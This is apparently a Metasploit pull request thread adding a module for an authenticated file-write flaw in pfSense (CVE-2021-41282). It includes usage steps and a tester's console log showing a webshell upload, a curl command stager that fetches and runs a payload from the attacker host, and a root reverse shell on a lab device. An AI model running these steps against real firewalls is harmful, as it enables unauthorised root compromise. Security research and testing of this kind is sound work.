pfSense Authenticated File Write (CVE-2021-41282)

[jbaines-r7]

Description

This module exploits an arbitrary file creation vulnerability in the pfSense HTTP interface (CVE-2021-41282). The vulnerability affects versions <= 2.5.2 and can be exploited by an authenticated user if they have the WebCfg - Diagnostics: Routing tables privilege. This module uses the vulnerability to create a web shell and execute payloads with root privileges.

pfSense's HTTP interface actually allows for arbitrary command execution by the admin user by default (which might be worth it's own module), but it also has very granular permissions for other users - down to the specific page. The installation instructions discuss how to create a user that only has access to the routing diagnostics page.

For some reason, there are many of these internet facing (52kish).

The one thing I don't care for about this module is that it deviates from other pfSense modules check implementations. The others extract the version string from the Dashboard view. However, that assumes the user has privileges to see the Dashboard which isn't a prerequisite to exploit this issue. So I opted to write an exploit check, which could leave a file behind on the target 🤷

Two other less useful but worth throwing-out-there observations:

1. No FreeBSD x64 Meterpreter? I could have used the php meterpreter here but it would have required even more steps.
2. pfSense exploit modules are in modules/exploits/unix. I thought this belonged in modules/exploits/freebsd but I stashed this in unix with the others for consistency. 🤷

Verification

• Follow the installation instructions included in the documentation.
• Start msfconsole
• use exploit/unix/http/pfsense_diag_routes_webshell
• set username <name>
• set password <password>
• set RHOST <ip>
• check
• Verify the remote target is flagged as vulnerable
• set LHOST <ip>
• exploit
• You should get a reverse shell

Video || GTFO

https://www.youtube.com/watch?v=cgtxDXJdtPY

PCAP || GTFO

pfsense_diag_reverse.zip

[bwatters-r7]

For anyone making a test VM, pfsense does not always like the default SCSI hard drives. In the past on ESXi, I have needed to specify an IDE interface HDD controller for the boot device.

[bwatters-r7]

Meh; I have a target for this. I'll grab it.
Testing:

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/unix/http/pfsense_diag_routes_webshell 
[*] Using configured payload bsd/x64/shell_reverse_tcp
msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set username Router_Person
username => Router_Person
msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set password v3Mpassword
password => v3Mpassword
msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set rhost 10.5.132.210
rhost => 10.5.132.210
msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set verbose true
verbose => true
msf6 exploit(unix/http/pfsense_diag_routes_webshell) > check

[!] This exploit may require manual cleanup of '/usr/local/www/LWOSCyFTww' on the target
[+] 10.5.132.210:443 - The target is vulnerable.
msf6 exploit(unix/http/pfsense_diag_routes_webshell) > show options

Module options (exploit/unix/http/pfsense_diag_routes_webshell):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   DELETE_WEBSHELL  true             yes       Indicates if the webshell should be deleted or not.
   PASSWORD         v3Mpassword      yes       Password to authenticate with
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS           10.5.132.210     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Me
                                               tasploit
   RPORT            443              yes       The target port (TCP)
   SRVHOST          0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the loc
                                               al machine or 0.0.0.0 to listen on all addresses.
   SRVPORT          8080             yes       The local port to listen on.
   SSL              true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                           no        The URI to use for this exploit (default is random)
   USERNAME         Router_Person    yes       Username to authenticate with
   VHOST                             no        HTTP server virtual host
   WEBSHELL_NAME                     no        The name of the uploaded webshell. This value is random if left unset


Payload options (bsd/x64/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CMD    /bin/sh          yes       The command string to execute
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   BSD Dropper


msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set lhost 10.5.135.101
lhost => 10.5.135.101
msf6 exploit(unix/http/pfsense_diag_routes_webshell) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Uploading webshell to /wBJGlLFp.php
[*] Testing if web shell installation was successful
[+] Web shell installed at /wBJGlLFp.php
[*] Executing BSD Dropper for bsd/x64/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/zjZ0rfMGchKU1HR
[*] Local IP: http://10.5.135.101:8080/zjZ0rfMGchKU1HR
[*] Generated command stager: ["curl -so /tmp/ThloXvFa http://10.5.135.101:8080/zjZ0rfMGchKU1HR;chmod +x /tmp/ThloXvFa;/tmp/ThloXvFa;rm -f /tmp/ThloXvFa"]
[*] Client 10.5.132.157 (curl/7.74.0) requested /zjZ0rfMGchKU1HR
[*] Sending payload to 10.5.132.157 (curl/7.74.0)
[*] Command Stager progress - 100.00% done (120/120 bytes)
[+] Deleted /usr/local/www/NswJlxAR
[+] Deleted /usr/local/www/wBJGlLFp.php
[*] Command shell session 1 opened (10.5.135.101:4444 -> 10.5.132.157:7321 ) at 2022-03-01 09:14:31 -0600
[*] Server stopped.

id
uid=0(root) gid=0(wheel) groups=0(wheel)
ifconfig
em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
	options=81009b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM,VLAN_HWFILTER>
	ether 00:0c:29:c8:f6:1d
	inet6 fe80::20c:29ff:fec8:f61d%em0 prefixlen 64 scopeid 0x1
	inet 10.5.132.157 netmask 0xffffff00 broadcast 10.5.132.255
	media: Ethernet autoselect (1000baseT <full-duplex>)
	status: active
	nd6 options=23<PERFORMNUD,ACCEPT_RTADV,AUTO_LINKLOCAL>
em1: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
	options=81009b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM,VLAN_HWFILTER>
	ether 00:0c:29:c8:f6:27
	inet6 fe80::20c:29ff:fec8:f627%em1 prefixlen 64 scopeid 0x2
	inet 10.5.132.210 netmask 0xffffff00 broadcast 10.5.132.255
	media: Ethernet autoselect (1000baseT <full-duplex>)
	status: active
	nd6 options=21<PERFORMNUD,AUTO_LINKLOCAL>
enc0: flags=0<> metric 0 mtu 1536
	groups: enc
	nd6 options=21<PERFORMNUD,AUTO_LINKLOCAL>
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> metric 0 mtu 16384
	options=680003<RXCSUM,TXCSUM,LINKSTATE,RXCSUM_IPV6,TXCSUM_IPV6>
	inet6 ::1 prefixlen 128
	inet6 fe80::1%lo0 prefixlen 64 scopeid 0x4
	inet 127.0.0.1 netmask 0xff000000
	groups: lo
	nd6 options=21<PERFORMNUD,AUTO_LINKLOCAL>
pflog0: flags=100<PROMISC> metric 0 mtu 33160
	groups: pflog
pfsync0: flags=0<> metric 0 mtu 1500
	groups: pfsync
uname -a
FreeBSD pfSense.home.arpa 12.2-STABLE FreeBSD 12.2-STABLE 1b709158e581(RELENG_2_5_0) pfSense  amd64

[smcintyre-r7]

We may want to consider something in the future to make this pattern of using a PHP webshell more reusable. Not something we need to handle in this PR but the pattern of dropping a webshell seems to be coming up more often.

[bwatters-r7]

Release Notes

This PR adds a module that exploits an authenticated arbitrary file creation vulnerability in the pfSense HTTP interface.